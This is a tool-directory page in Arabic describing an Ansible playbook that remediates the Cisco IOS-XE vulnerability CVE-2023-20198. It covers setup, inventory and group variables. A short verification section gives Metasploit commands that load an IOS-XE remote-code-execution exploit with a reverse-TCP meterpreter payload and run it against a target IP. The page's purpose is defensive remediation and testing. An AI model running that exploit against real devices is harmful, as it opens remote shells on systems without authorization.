Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-20198-Fix — افحص الظروف التي تجعل جهاز IOS-XE عرضة للثغرة CVE-2023-20198 وعالجها. | Kitploit
أدوات/GitHubGitHub/netbell/cve-2023-20198-fix
ماسحات الثغرات الأمنيةالاستغلالتدقيق التكوينأمن الشبكاتDevSecOpsالاستجابة للحوادث
GitHubnetbell/cve-2023-20198-fix

CVE-2023-20198-Fix

افحص الظروف التي تجعل جهاز IOS-XE عرضة للثغرة CVE-2023-20198 وعالجها.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-20198-Fix

يحتوي هذا المستودع على قائمة تشغيل Ansible لإصلاح ثغرة CVE-2023-20198 المكتشفة في بعض أجهزة Cisco.

وهو يقوم بما يلي:

  1. يتحقق مما إذا كانت خدمة الويب تعمل على الموجّه عن طريق التحقق من الأوامر المرتبطة بها في running config
  2. يعطّل خدمة الويب إذا كانت تعمل
  3. يحفظ التهيئة إذا تم تغييرها
  4. يفحص السجلات بحثًا عن علامات استغلال سابقة

هيكل الدليل:

root@kitploit:~
CVE-2023-20198-Fix/
│
├── ansible.cfg            # Ansible configuration file
├── group_vars/            # Directory for variables specific to groups of hosts
│   └── iosxe_devices.yml  # Variable definitions for IOS-XE devices
├── inventory.yml          # Inventory of hosts, including devices to target
└── remediate.yml          # Playbook for remediating CVE-2023-20198

الشروع في العمل

المتطلبات الأساسية

تأكد من تثبيت Ansible على جهاز التحكم الخاص بك. تمت كتابة قائمة التشغيل هذه لـ Ansible 2.9 أو أحدث.

الإعداد

قم بتهيئة Ansible: قم بتعديل ansible.cfg ليطابق إعدادات بيئتك.

قائمة الأجهزة:

قم بتحديث inventory.yml ببيانات الأجهزة الخاصة بأجهزة IOS-XE لديك.

المتغيرات:

قم بتعريف أي متغيرات ضرورية في group_vars/iosxe_devices.yml. يجب أن يتضمن ذلك أي إعدادات مشتركة لأجهزة IOS-XE لديك، مثل إعدادات الاتصال وبيانات الاعتماد.

إضافة مضيفين إلى قائمة الأجهزة

لإضافة جهاز IOS-XE جديد إلى قائمة الأجهزة، قم بتعديل ملف inventory.yml وأضف المضيف الجديد ضمن المجموعة المناسبة:

root@kitploit:~
iosxe_devices:
  hosts:
    vulnerable_router01:
      ansible_host: 192.168.1.3
      # ... other necessary variables

استبدل new_router01 باسم مضيف جهازك ومتغيرات ansible_* بالقيم الفعلية لجهازك.

تحديث متغيرات المجموعة

إذا كنت بحاجة إلى تحديث بيانات الاعتماد أو الإعدادات الأخرى لمجموعة أجهزة IOS-XE، فقم بتعديل ملف group_vars/iosxe_devices.yml:

root@kitploit:~
---
ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password            # Lab use only, store credentials responsibly!
ansible_become_method: enable
ansible_become_password: admin_password     # Lab use only, store credentials responsibly!
# ... other variables

تشغيل الـ Playbook

لتنفيذ الـ Playbook، استخدم الأمر التالي:

root@kitploit:~
ansible-playbook remediate.yml -i inventory.yml

التحقق باستخدام Metasploit

أوامر MSF6

root@kitploit:~
use exploit/linux/misc/cisco_ios_xe_rce
set RHOST 192.168.10.242     # Your target IP
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp
check
exploit

الفحص قبل الإصلاح

قبل

تنفيذ الـ Playbook

تشغيل

الفحص بعد الإصلاح

قبل

الاختبار

اختبر تغييراتك دائمًا في بيئة خاضعة للتحكم قبل تشغيل الـ Playbook في بيئة الإنتاج.

الأمان

قم بتخزين البيانات الحساسة مثل كلمات المرور والمفاتيح السرية باستخدام Ansible Vault. لا تقم بتخزين بيانات الاعتماد كنص صريح في ملفات inventory أو group_vars.

للحصول على إجراءات أمنية إضافية وأفضل الممارسات، راجع الوثائق الرسمية لـ Ansible.

يرجى استبدال جميع القيم النائبة ببيانات فعلية تتوافق مع بيئتك. يفترض هذا README معرفة أساسية بمفاهيم Ansible مثل قائمة الأجهزة (inventory) والمتغيرات وتشغيل قوائم التشغيل.

تنزيل الأداة